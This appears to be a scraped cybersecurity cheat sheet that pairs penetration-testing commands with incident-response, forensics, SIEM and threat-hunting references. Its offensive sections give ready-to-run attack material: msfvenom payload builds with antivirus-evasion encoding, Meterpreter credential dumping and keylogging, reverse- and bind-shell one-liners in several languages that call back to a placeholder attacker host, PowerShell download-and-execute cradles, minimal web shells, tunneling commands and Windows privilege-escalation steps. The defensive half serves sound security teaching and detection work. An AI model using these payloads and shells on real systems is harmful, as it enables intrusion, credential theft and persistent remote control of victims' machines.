set RHOSTS 192.168.1.100Set target host(s)
set LHOST 192.168.1.50Set attacker listener IP
set LPORT 4444Set listener port
run / exploitExecute the module
checkCheck if target is vulnerable (if supported)
backGo back to main console from module
sessions -lList all active sessions
sessions -i 1Interact with session 1
jobs -lList background jobs
db_nmap -sV -p- 192.168.1.0/24Run Nmap and save results to MSF database
msfvenom Payload Generation
msfvenom -l payloads | grep windowsList Windows payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exeWindows x64 staged Meterpreter EXE
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shellLinux x64 staged Meterpreter ELF
msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.phpPHP Meterpreter web shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exeWindows staged shell (no Meterpreter)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=IP LPORT=443 -f exe -o https_shell.exeHTTPS payload — blends with web traffic
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f war -o shell.warJava WAR file (Tomcat)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -e x64/xor -i 10 -f exe -o enc_shell.exeEncoded with 10 iterations (AV evasion attempt)
Meterpreter Commands
sysinfoTarget system info — OS, hostname, arch
getuidCurrent user on target
getpidCurrent process PID
psRunning processes list
migrate PIDMigrate to another process (stability / SYSTEM)
getsystemAttempt local privilege escalation to SYSTEM
hashdumpDump local SAM password hashes
shellDrop to OS shell
upload /local/file C:\\target\\pathUpload file to target
download C:\\target\\file /local/pathDownload file from target
search -f *.txt -d C:\\UsersSearch for files on target
keyscan_startStart keylogger
keyscan_dumpDump captured keystrokes
screenshotCapture desktop screenshot
portfwd add -l 3389 -p 3389 -r 192.168.1.100Port forward RDP through session
backgroundBackground current session (back to msfconsole)
run post/multi/recon/local_exploit_suggesterLocal exploit suggester
Common Exploit Modules
exploit/windows/smb/ms17_010_eternalblueEternalBlue — Windows 7/2008 SMBv1 critical
exploit/windows/smb/ms08_067_netapiMS08-067 — Windows XP/2003 critical
exploit/multi/handlerGeneric listener — catch manual payloads
exploit/unix/webapp/wp_admin_shell_uploadWordPress admin file upload
exploit/multi/http/log4shell_header_injectionLog4Shell CVE-2021-44228
exploit/windows/local/bypassuacUAC bypass (local privesc)
auxiliary/scanner/smb/smb_ms17_010Check for EternalBlue (scanner, not exploit)
auxiliary/scanner/ssh/ssh_loginSSH brute force
auxiliary/scanner/http/dir_scannerWeb directory enumeration
Post-Exploitation Modules
run post/multi/recon/local_exploit_suggesterSuggest local exploits for current session
run post/windows/gather/credentials/credential_collectorCollect browser saved passwords, WiFi keys, etc.
run post/windows/gather/smart_hashdumpDump hashes — handles both local and domain accounts
run post/windows/manage/enable_rdpEnable RDP and add firewall rule
run post/multi/manage/shell_to_meterpreterUpgrade a generic shell session to Meterpreter
run post/windows/gather/enum_applicationsList installed applications — find outdated software
run post/windows/gather/enum_logged_on_usersUsers currently logged on and recently logged on
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24ARP scan from compromised host — internal network mapping
run post/multi/gather/ssh_credsCollect SSH keys from home directories
run auxiliary/server/capture/smbStart SMB capture server — catch NTLMv2 hashes
Pivoting & Tunneling
route add 10.10.10.0/24 SESSION_IDAdd internal subnet route through Meterpreter session
route printShow MSF routing table
use auxiliary/server/socks_proxy; set SRVPORT 1080; runStart SOCKS4/5 proxy through pivot session
portfwd add -l 3389 -p 3389 -r 10.10.10.5Port forward RDP to internal host via Meterpreter
portfwd listShow active port forwards in session
use post/multi/manage/autoroute; set SESSION 1; runAuto-add routes for all subnets accessible from pivot
proxychains nmap -sT -Pn 10.10.10.0/24Route Nmap through SOCKS proxy (requires TCP connect scan)
meterpreter > run auxiliary/scanner/portscan/tcp RHOSTS=10.10.10.0/24Port scan internal network from pivot (no proxychains needed)
Database & Workspace Management
db_statusCheck if PostgreSQL database is connected
workspaceList all workspaces
workspace -a client_pentestCreate and switch to new workspace
hostsAll discovered hosts in current workspace
servicesAll discovered services (from scans and sessions)
vulnsAll confirmed vulnerabilities
credsAll collected credentials
lootAll files/data collected from targets
db_import scan.xmlImport Nmap XML results into MSF database
db_export -f xml /tmp/results.xmlExport all findings to XML for reporting
IR Phases (NIST SP 800-61)
1. PreparationIR team, playbooks, tools, communication trees, and backup procedures in place before incident
2. Detection & AnalysisIdentify IOCs, determine scope/severity/affected assets, classify incident type
3. Containment — Short-termIsolate affected systems, block IOCs at firewall, disable compromised accounts
3. Containment — Long-termPatch entry points, segment network, replace affected systems
4. EradicationRemove malware, close entry points, reset all credentials, rebuild systems if needed
5. RecoveryRestore from clean backups, monitor closely, verify normal operation
6. Lessons LearnedTimeline documentation, root cause analysis, playbook updates, detection improvement
Initial Triage Checklist
Identify alert sourceSIEM / EDR / user report / IDS / external notification?
Classify severityCritical=active exfil/ransomware; High=confirmed compromise; Medium=suspicious; Low=anomaly
DO NOT reboot yetVolatile data (RAM, connections, processes) will be lost — capture first
Preserve volatile data firstOrder: memory → network connections → running processes → open files → logs
Document everything in UTCWho, what, when, how — timestamped in UTC. Court-admissible chain of custody
Verify before actingCross-check IOC against threat intel. Avoid false-positive containment of prod systems
Notify stakeholdersPer escalation matrix: manager → CISO → legal → compliance (if PII involved)
Windows Live Response
netstat -anoActive connections with PID — look for unusual ports/IPs
tasklist /svcRunning processes with hosted services
wmic process get name,pid,parentprocessid,commandlineFull process list with command lines
schtasks /query /fo LIST /v | findstr "Task Name\|Run As\|Task To Run"Scheduled tasks — persistence check
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunAutorun keys (HKLM)
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunAutorun keys (HKCU — per user)
sc query type= all state= allAll services including stopped
net user /domainDomain users — check for backdoor accounts
net localgroup administratorsLocal admin group — unauthorized members?
ipconfig /allNetwork adapters — look for suspicious tunneling adapters
route printRouting table — unusual routes added?
Get-EventLog -LogName Security -EntryType FailureAudit -Newest 50Recent security failures
Windows Security Event IDs
4624Successful logon — Type 2=interactive, 3=network, 10=remote, 4=batch
4625Failed logon — look for volume from same source (brute force)
4648Logon using explicit credentials — runas, Pass-the-Hash indicator
4672Special privileges assigned — admin logins
4688New process created — enable command line auditing to see full args
4689Process terminated
4698Scheduled task created — persistence mechanism
4720 / 4726User created / deleted
4732Member added to local admin group
4756Member added to universal security group
4771Kerberos pre-auth failed — possible AS-REP Roasting or brute force
4776NTLM authentication attempt — NTLM should be rare in modern AD
7045New service installed — common persistence/privilege escalation
1102Audit log cleared critical — attacker covering tracks
4104PowerShell script block logging — reveals obfuscated PS commands
4103PowerShell module logging
Linux Live Response
w && who && last -a | head -30Active users + login history
ps auxf --sort=-pcpuProcess tree sorted by CPU
ss -tulpn && netstat -tulpnAll listening services with PIDs
lsof -i -n -PAll open network connections
find /tmp /var/tmp /dev/shm -type f -ls 2>/dev/nullFiles in world-writable dirs (malware drops)
crontab -l 2>/dev/null; ls /etc/cron*All cron jobs
find / -newer /tmp/baseline -type f 2>/dev/nullFiles newer than a reference time (new files)
awk '!seen[$0]++' /etc/passwdCheck for duplicate users in passwd
grep -r "NOPASSWD" /etc/sudoers* 2>/dev/nullSudo without password — privesc risk
find / -name ".ssh" -type d 2>/dev/null | xargs ls -laFind all .ssh directories and authorized_keys
Ransomware Response Playbook
Immediate: Network IsolateDisconnect affected hosts from network (physically or via NAC/firewall). Do NOT power off — volatile evidence lost.
Identify patient zeroCheck earliest encrypted file timestamps, email logs, VPN/RDP logs for initial access time and vector
Check vssadmin list shadowsWere shadow copies deleted? (attacker command: vssadmin delete shadows /all /quiet)
Identify encryption extensionNote the appended extension (e.g., .locked, .encrypted) — use ID Ransomware site to identify family
DO NOT pay immediatelyCheck: NoMoreRansom.org for free decryptors first. Notify legal and law enforcement (FBI IC3)
Check lateral spreadQuery SIEM for same process tree, C2 connections, or SMB activity from patient zero to other hosts
Preserve ransom noteHash and collect ransom note files — contain unique victim ID needed for decryption if key purchased
Restore from backupVerify backups are clean (not encrypted) and offline. Restore to clean images, not same compromised OS
Post-incident: auditIdentify and close entry point (patching, credential reset, MFA on RDP/VPN). Hunt for other implants before going live
Memory Acquisition
winpmem_mini.exe memory.rawWindows memory dump — lightweight, no driver install required
DumpIt.exeMoonsols DumpIt — click to dump, creates .raw in same dir
FTK Imager → File → Capture MemoryGUI memory acquisition with pagefile option
Task Manager → Details → Right-click → Create Dump FileQuick process memory dump (single process only)
procdump.exe -ma lsass.exe lsass.dmpSysinternals — dump LSASS for offline cred extraction
sudo avml /tmp/memory.limeLinux memory acquisition via AVML (Rust-based, no kernel module)
sudo insmod lime.ko "path=/tmp/mem.lime format=lime"Linux LiME kernel module memory dump
sudo dd if=/dev/mem bs=1M of=/tmp/mem.raw 2>/dev/nullLinux raw memory (limited — misses high memory on modern systems)
Size check: phys_addr_ranges in /proc/iomemLinux: check physical memory ranges before capturing
Cloud IR — AWS Quick Response
aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=compromised-userGet all API calls by compromised user
aws iam list-attached-user-policies --user-name attackerWhat permissions does the compromised user have?
aws ec2 describe-instances --filters "Name=instance-state-name,Values=running"List all running EC2 instances — look for rogue instances
aws s3api get-bucket-acl --bucket bucket-nameCheck if S3 bucket is publicly accessible
aws guardduty list-findings --detector-id IDList GuardDuty threat findings
aws iam create-policy + attach → isolateContainment: attach deny-all policy to compromised IAM role/user
aws ec2 create-snapshot --volume-id vol-xxxSnapshot compromised EC2 volume for forensic copy
aws logs get-log-events --log-group-name /aws/cloudtrail --log-stream-name streamRead CloudTrail logs from CloudWatch
Disable access key: aws iam update-access-key --status InactiveRevoke compromised API key immediately
Order of Volatility (Evidence Priority)
1. CPU registers / cacheMost volatile — lost immediately on any change
2. RAM (memory)Running processes, encryption keys, network connections, unencrypted data
3. Network stateActive connections, ARP cache, routing tables, firewall state
4. Running processesProcess list, open files, loaded modules
5. Disk (file system)Files, logs, registry, artifacts — less volatile but still changes
6. Remote loggingCentralized SIEM logs — already preserved off-host
7. Backups / archivesMost stable — historical snapshots
Volatility 3 Memory Forensics
vol -f memory.raw windows.infoOS profile and basic system info
vol -f memory.raw windows.pslistList processes (from EPROCESS list)
vol -f memory.raw windows.pstreeProcess tree with parent-child
vol -f memory.raw windows.psscanScan for processes (finds hidden/unlinked)
vol -f memory.raw windows.cmdlineCommand lines for each process
vol -f memory.raw windows.netscanNetwork connections and sockets
vol -f memory.raw windows.dlllist --pid 1234DLLs loaded by specific process
vol -f memory.raw windows.malfindFind injected code / suspicious memory regions
vol -f memory.raw windows.hashdumpExtract NTLM password hashes from SAM
vol -f memory.raw windows.registry.hivelistList registry hives in memory
vol -f memory.raw windows.filescanScan for file objects in memory
vol -f memory.raw windows.dumpfiles --pid 1234Dump files associated with process
Windows Artifact Locations
C:\Windows\Prefetch\*.pfProgram execution evidence — last 8 run times, up to 128 entries
C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\Recently accessed files (LNK shortcut files)
C:\Users\*\NTUSER.DATUser registry hive — contains most user-specific artifacts
C:\Windows\System32\winevt\Logs\Windows Event Log files (.evtx)
C:\Windows\System32\config\System registry hives: SAM, SYSTEM, SECURITY, SOFTWARE
C:\$MFTMaster File Table — metadata for every file ever on NTFS volume
C:\$LogFileNTFS journal — file system change log
C:\Windows\AppCompat\Programs\Amcache.hveProgram execution and SHA1 hashes of executables
C:\Windows\AppCompat\Programs\ShimcacheApplication Compatibility Cache — executed programs list
C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.datShellBags — folder access history
Registry Forensics — Key Locations
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersionOS version, install date, registered owner
HKLM\SYSTEM\CurrentControlSet\ServicesInstalled services (malware persistence)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunSystem-wide autorun programs
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunPer-user autorun programs
HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformationSystem timezone (critical for timeline)
HKLM\SAM\SAM\Domains\Account\UsersLocal user accounts and password hashes
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocsRecently opened documents
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRURun dialog history
HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLsURLs typed in IE address bar
NTUSER.DAT\SOFTWARE\Microsoft\Windows\Shell\BagMRUShellBags — folder navigation history
Browser Artifacts
Chrome History%LOCALAPPDATA%\Google\Chrome\User Data\Default\History (SQLite)
Chrome Downloads%LOCALAPPDATA%\Google\Chrome\User Data\Default\History — Downloads table
Chrome Cookies%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies
Chrome Passwords%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data (encrypted)
Firefox History%APPDATA%\Mozilla\Firefox\Profiles\*.default\places.sqlite
Edge History%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\History
Extract Chrome history (Linux)sqlite3 History "SELECT url,title,last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 50"
Disk Imaging & Acquisition
dd if=/dev/sda of=/mnt/evidence/disk.img bs=4M conv=noerror,sync status=progressFull disk image with dd — sync fills read errors with zeros
dcfldd if=/dev/sda of=disk.img hash=sha256 hashlog=hash.txt bs=4Mdcfldd — dd with built-in hashing and progress (forensic dd)
ewfacquire /dev/sdaAcquire to Expert Witness Format (.E01) — compressed, with metadata
sha256sum disk.img > disk.img.sha256Hash image immediately after acquisition — document in chain of custody
fdisk -l disk.imgShow partition table of acquired image
mount -o loop,ro,offset=$((512*START)) disk.img /mnt/evidenceMount partition from image read-only (offset = sector * 512)
autopsyGUI forensic suite — timeline, file carving, keyword search, hash lookup
mmls disk.imgSleuth Kit — list partition layout of disk image
fls -r -m / disk.img | mactime -b - > timeline.txtBuild MAC-time filesystem timeline from disk image
icat disk.img inode_num > recovered_fileExtract file by inode from disk image (even if deleted)
Email Header Analysis
Received: fromTrace email path — read bottom-up (first hop at bottom, last at top)
X-Originating-IPClient IP that submitted the email — most useful for phishing origin
Return-Path / Reply-ToMismatch between From and Return-Path → likely spoofed or phishing
DKIM-Signature: d=domain.comSigning domain — should match From domain. Verify with public DNS key.
Authentication-Results: spf=passSPF result — fail or softfail means sender not authorized for that domain
Authentication-Results: dmarc=failDMARC fail — neither SPF nor DKIM aligned with From domain
Message-ID: <id@domain>Unique message identifier — should match sending mail server's domain
X-Mailer / User-AgentMail client used — unusual values may indicate automated sending
MXToolbox Email Header AnalyzerPaste full headers at mxtoolbox.com/EmailHeaders — visualizes hop timing and auth results
Submission timestamp vs ReceivedLarge time gaps between Received hops indicate queue delays or relay manipulation
Log Analysis — Key Commands
grep "4624\|4625\|4648" Security.evtx.export.txt | head -100Filter exported Windows event log for logon events
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624} -MaxEvents 50 | Format-ListPowerShell — query event log with filter
wevtutil qe Security "/q:*[System[EventID=4688]]" /f:text /c:100Query EVTX for process creation events (wevtutil)
log2timeline.py /output/plaso.db /path/to/evidencePlaso — ingest all log sources into single super-timeline
psort.py -z UTC -o l2tcsv /output/plaso.db "GREP TERM" > timeline.csvFilter Plaso timeline and export to CSV
cat access.log | awk '{print $7}' | sort | uniq -c | sort -rn | head -30Top requested URI paths from Apache/Nginx access log
zcat /var/log/auth.log.*.gz | grep "Accepted"Search compressed rotated log files without extracting
journalctl --since "2024-01-01" --until "2024-01-02" -u sshSSH logs between specific dates from systemd journal
Reverse Shell One-Liners
bash -i >& /dev/tcp/LHOST/LPORT 0>&1Bash TCP reverse shell
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'Bash (exec wrapper)
0<&196;exec 196<>/dev/tcp/LHOST/LPORT; sh <&196 >&196 2>&196Bash — alternative method
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'Python 3 reverse shell
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh","-i"])'Python 2 reverse shell
php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");'PHP reverse shell
nc -e /bin/sh LHOST LPORTNetcat with -e (if supported)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/fNetcat without -e (mkfifo method)
perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Perl reverse shell
ruby -rsocket -e 'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'Ruby reverse shell
PowerShell Reverse Shells
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Full PowerShell TCP reverse shell
IEX(New-Object Net.WebClient).downloadString('http://LHOST/Invoke-PowerShellTcp.ps1')Download and execute Nishang TCP reverse shell
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://LHOST/shell.ps1')"Common PS download cradle — execution bypass
powershell -EncodedCommand [base64_encoded_payload]Base64-encoded PS command (obfuscation)
echo "IEX..." | iconv -t utf-16le | base64 -w0Encode PS payload to base64 (UTF-16LE required)
Upgrade Shell to Full TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'Step 1: Spawn PTY with Python
python -c 'import pty;pty.spawn("/bin/bash")'Step 1: Python 2 version
Ctrl+ZStep 2: Background the netcat session
stty raw -echo; fgStep 3: Raw terminal mode, foreground session
export TERM=xterm-256colorStep 4: Set terminal type
stty rows 50 cols 200Step 5: Set terminal size (match your window)
script /dev/null -c bashAlternative to Python — uses script command
/usr/bin/script -qc /bin/bash /dev/nullscript method full command
File Transfer Methods
python3 -m http.server 8080Start HTTP server on port 8080 (attacker side)
wget http://LHOST:8080/file -O /tmp/fileDownload via wget (target side)
curl http://LHOST:8080/file -o /tmp/fileDownload via curl
certutil.exe -urlcache -f http://LHOST/file.exe C:\file.exeWindows download via certutil (LOL binary)
powershell -c "(New-Object Net.WebClient).DownloadFile('http://LHOST/file','C:\file')"PowerShell download
Invoke-WebRequest -Uri http://LHOST/file -OutFile C:\filePowerShell IWR download
scp file user@target:/tmp/fileSecure copy via SSH
nc -lvp 4444 > file_received && nc LHOST 4444 < file_to_sendTransfer via netcat
base64 file | xclip -sel clipEncode to base64 — paste through shell
impacket-smbserver share . -smb2supportStart SMB server in current dir (Windows targets)
Web Shells
<?php system($_GET['cmd']); ?>Minimal PHP web shell — ?cmd=id
<?php echo shell_exec($_GET['c']); ?>PHP shell_exec variant
<?php passthru($_REQUEST['cmd']); ?>PHP passthru — GET or POST
<?php if(isset($_REQUEST['cmd'])){echo "<pre>";$cmd=$_REQUEST['cmd'];system($cmd);echo "</pre>";die;} ?>PHP with pre tags for formatted output
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>JSP web shell (Tomcat)
<% eval request("cmd") %>ASP web shell (Classic ASP)
curl http://target/shell.php?cmd=idExecute command via GET
curl -X POST http://target/shell.php -d "cmd=id"Execute via POST (less visible in logs)
Bind Shells
nc -lvp 4444 -e /bin/bashLinux bind shell — listen on 4444, connect from attacker: nc TARGET 4444
ncat -lvp 4444 --sh-exec /bin/bashNcat bind shell (more reliable than nc -e)
python3 -c 'import socket,subprocess,os;s=socket.socket();s.bind(("0.0.0.0",4444));s.listen(1);c,a=s.accept();[os.dup2(c.fileno(),fd) for fd in(0,1,2)];subprocess.call(["/bin/sh"])'Python bind shell
powershell -NoP -NonI -W Hidden -c "$l=New-Object Net.Sockets.TcpListener(4444);$l.Start();$c=$l.AcceptTcpClient();$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$sb+='PS '+(pwd).Path+'> ';$se=([Text.Encoding]::ASCII).GetBytes($sb);$s.Write($se,0,$se.Length)}"PowerShell bind shell
msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind.exeWindows bind shell payload via msfvenom
Socat & Chisel Tunneling
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bashSocat bind shell — full duplex, handles multiple connections
socat TCP:LHOST:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,saneSocat reverse shell — full TTY (no upgrade needed!)
socat TCP-LISTEN:4444,reuseaddr FILE:`tty`,raw,echo=0Socat listener — attach to incoming full TTY session
socat TCP:LHOST:443 OPENSSL-LISTEN:444,cert=cert.pem,verify=0,forkSocat SSL tunnel — encrypted reverse shell
chisel server -p 8080 --reverseChisel server (attacker) — start reverse tunnel listener
chisel client ATTACKER:8080 R:socksChisel client (target) — create SOCKS5 reverse tunnel back to attacker
chisel client ATTACKER:8080 R:3306:127.0.0.1:3306Chisel — expose target's internal MySQL port on attacker's 3306
chisel server -p 8080 --reverse --auth user:passChisel with authentication — prevents unauthorized tunnel hijacking
proxychains4 ssh user@internal-hostUse proxychains with chisel SOCKS tunnel to reach internal hosts
Windows Privilege Escalation
whoami /privCurrent user privileges — look for SeImpersonatePrivilege, SeDebugPrivilege
SeImpersonatePrivilege → PotatoSeImpersonate enabled = run GodPotato, PrintSpoofer, or JuicyPotato for SYSTEM
PrintSpoofer64.exe -i -c cmdExploit SeImpersonatePrivilege via Print Spoofer → SYSTEM shell
GodPotato -cmd "net localgroup administrators user /add"GodPotato — works on Windows 2012-2022
winPEAS.exeAutomated Windows privesc enumeration — checks all common paths
.\Seatbelt.exe -group=allSeatbelt — targeted local system survey for misconfigs
sc qc "ServiceName"Check service binary path — is it writable?
icacls "C:\Path\to\service.exe"Check file permissions — BUILTIN\Users:(F) = full control = pwned
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevatedAlwaysInstallElevated = 1 → create malicious MSI → SYSTEM
Get-Hotfix | sort InstalledOn -Desc | head -10Recently installed patches — identify missing patches for kernel exploits
Alert Triage Process
1. ValidateTrue positive or false positive? Context: user behavior, asset criticality, time of day
2. EnrichAdd threat intel: VirusTotal, Shodan, AbuseIPDB, internal CMDB, user account info
3. ScopeIsolated or widespread? Check for lateral movement, other alerts from same source
4. ClassifyPhishing / Malware / Brute Force / Insider / DDoS / Exfiltration / Ransomware
5. RespondFollow runbook for alert type. Document all actions with UTC timestamps
6. CloseResolution, ticket update, tuning if FP, lessons learned
MITRE ATT&CK — Key Techniques
T1566 — PhishingSuspicious sender, attachment types (.iso,.lnk,.docm), unusual domain, urgency
T1059 — Command InterpreterPowerShell/cmd/bash with obfuscated args, unusual parent process
T1078 — Valid AccountsLegitimate creds misused: off-hours, new geo, impossible travel, bulk access
T1055 — Process InjectionProcess writing to another: lsass, explorer, svchost injection
T1110 — Brute ForceMany 4625 events, rapid auth failures, password spray (1 attempt per many accounts)
T1071 — Application Layer C2Beaconing: regular intervals, low byte count, encrypted POST to rare domains
T1048 — ExfiltrationLarge DNS TXT responses, cloud storage uploads, unusual FTP/HTTP data-out volume
T1547 — Boot PersistenceNew Run keys, scheduled tasks, services, startup folder items
T1003 — Credential DumpingLSASS access by non-SYSTEM process, SAM dump, Mimikatz artifact names
T1021 — Lateral MovementSMB/WMI/RDP between internal hosts, PsExec artifacts, admin share access
T1486 — Data Encrypted (Ransomware)Mass file renames, shadow copy deletion (vssadmin delete), encryption process
T1562 — Impair DefensesAV/EDR disable, firewall rule changes, log clearing, Safe Mode boot
SIEM Query Examples — Splunk
index=windows EventCode=4625 | stats count by src_ip | sort -count | head 20Top IPs with failed logins
index=windows EventCode=4624 Logon_Type=10 | stats count by Account_Name, src_ipRemote interactive logins
index=windows EventCode=4688 | rex field=CommandLine "(?<cmd>powershell|cmd|wscript|cscript)" | stats count by cmd,Account_NameScript interpreter usage
index=proxy | stats sum(bytes_out) by src_ip | sort -sum(bytes_out) | head 10Top data exfiltrators by bytes
index=dns | stats count by query | sort -count | head 50Most queried domains
index=windows earliest=-24h | timechart count by EventCodeEvent volume over 24h by EventCode
| tstats count WHERE index=* BY _time span=1h host | anomalydetectionAnomaly detection on host event volume
SIEM Query Examples — Elastic/KQL
event.code : "4625" and winlog.event_data.LogonType : "3"Network logon failures
event.code : "4688" and process.command_line : *mimikatz*Mimikatz execution
event.category : "network" and destination.port : (4444 or 1337 or 8888)Connections to common backdoor ports
process.name : "powershell.exe" and process.args : (*-enc* or *-encoded*)Encoded PowerShell commands
dns.question.name : /.*\.ru$/ or dns.question.name : /.*\.cn$/DNS queries to specific TLDs
event.code : "1102" or event.code : "104"Security log or System log cleared
IOC Types & Confidence
File Hash (SHA256) HighUnique per file. Most reliable IOC. Never rely on MD5 alone (collision risk)
Network Signature HighProtocol anomalies, beacon timing patterns, Snort/Yara network rules
Mutex / Registry Key HighOften hardcoded in malware families — very specific
URL Medium-HighMore specific than domain — full path including parameters
Domain MediumDGA domains rotate. Check WHOIS age, cert, registrar context
IP Address MediumIPs rotate frequently. Check ASN, hosting provider, geo context
Email Address Low-MediumEasily spoofed. Validate via SPF/DKIM/DMARC headers
User Agent LowTrivially changed. Useful only for correlation, not attribution
Key Log Sources for SOC
Windows Security LogLogon/logoff, process creation (4688), privilege use, account changes
Windows Sysmon (Event ID 1-28)Process create, network connections, file hash, DNS queries, registry — essential
PowerShell Script Block (4104)Decoded PowerShell — catches all obfuscation
DNS Server LogsAll queries — DGA detection, tunneling, C2 beaconing, exfil
Firewall / NSG LogsAllow/deny, port scans, geo anomalies, policy violations
Web Proxy / GatewayURLs, categories, bytes transferred, user agents, MIME types
EDR TelemetryProcess trees, file operations, network per-process, memory events
Active Directory LogsGroup changes, LDAP enumeration, account lockouts, Kerberos events
Email GatewayAttachments, links, SPF/DKIM/DMARC failures, sender reputation
VPN / Remote AccessImpossible travel, concurrent sessions, off-hours access, new devices
Threat Intel Platforms
VirusTotalHash / IP / domain / URL — 70+ AV engine scan results
ShodanInternet-exposed devices, open ports, CVEs, banner info
AbuseIPDBIP abuse reports — brute force, C2, spam history
URLScan.ioSafe website analysis — screenshot + network requests without visiting
ANY.RUNInteractive malware sandbox — real-time analysis
MalwareBazaarMalware sample database by abuse.ch — search by hash/family
Hybrid AnalysisFree malware sandbox — behavioral and static analysis
MISPThreat intelligence sharing platform — IOC feeds
OpenCTIOpen-source CTI platform — structured threat data
Talos IntelligenceCisco Talos — email sender reputation, IP/domain intel
GreyNoiseDistinguish targeted attacks from mass internet scanning
Have I Been PwnedCheck if emails/passwords in known breaches
Threat Hunting Hypotheses
LSASS access by non-systemHunt: processes opening lsass.exe with PROCESS_VM_READ that aren't AV/EDR → Mimikatz/cred dumping
Encoded PowerShell prevalenceHunt: count hosts running PS -EncodedCommand — rare hosts running it are suspicious
Parent-child anomaliesHunt: Office apps spawning cmd/powershell/wscript/regsvr32 → macro execution or exploitation
Unusual outbound portsHunt: endpoints connecting outbound on 4444, 1337, 31337, 8888 — common C2 ports
New local admin accountsHunt: Event 4720 (account created) + 4732 (added to admin group) within same hour
Scheduled task from tempHunt: schtasks.exe creating tasks with command in %TEMP%, %APPDATA%, or %PUBLIC%
Rare binary on many hostsHunt: executable with low prevalence appearing on multiple machines simultaneously → lateral tool drop
DNS beaconingHunt: same domain queried at regular intervals (±10% jitter) from endpoint → C2 DNS check-in
Runkey persistenceHunt: processes spawned from Run keys that aren't in baseline — compare against approved software list
Living off the landHunt: certutil, regsvr32, mshta, rundll32 with network connections — LOLBin abuse
Email Phishing Analysis
Check SPF/DKIM/DMARCAuthentication failures are red flags. Check Authentication-Results header — all three should pass for legit mail
Sender domain ageUse WHOIS — domains registered <30 days ago are high risk phishing infrastructure
URL reputationCheck all links: VirusTotal, URLScan.io, URLVoid. Hover to see real URL vs displayed text
Attachment analysisNever open directly. Upload to Any.Run, Hybrid Analysis, or VirusTotal Sandbox
Look-alike domainsmicro$oft.com, paypa1.com, arnazon.com — IDN homograph attacks use Unicode chars
Urgency + authoritySocial engineering signals: "URGENT", "Your account will be suspended", "CEO", "IT Security"
Macro-enabled Office.docm, .xlsm, .xlsb — prompt user to enable macros. Modern orgs should block via policy
ISO / LNK attachmentsBypass Mark-of-the-Web. ISO contains LNK → spawns powershell/cmd. Increasing trend since 2021
oletools: olevba malicious.docmExtract and analyze VBA macros without opening in Office
phishtool.com / emailrep.ioAutomated phishing email analysis and sender reputation check
Sysmon Event IDs Reference
Event 1 — Process CreateFull command line, parent process, user, hash — most valuable Sysmon event
Event 3 — Network ConnectionProcess making TCP/UDP connections — catch reverse shells and C2 beaconing
Event 7 — Image LoadedDLL loaded by process — detect DLL injection, side-loading
Event 8 — CreateRemoteThreadProcess injecting thread into another — classic shellcode injection indicator
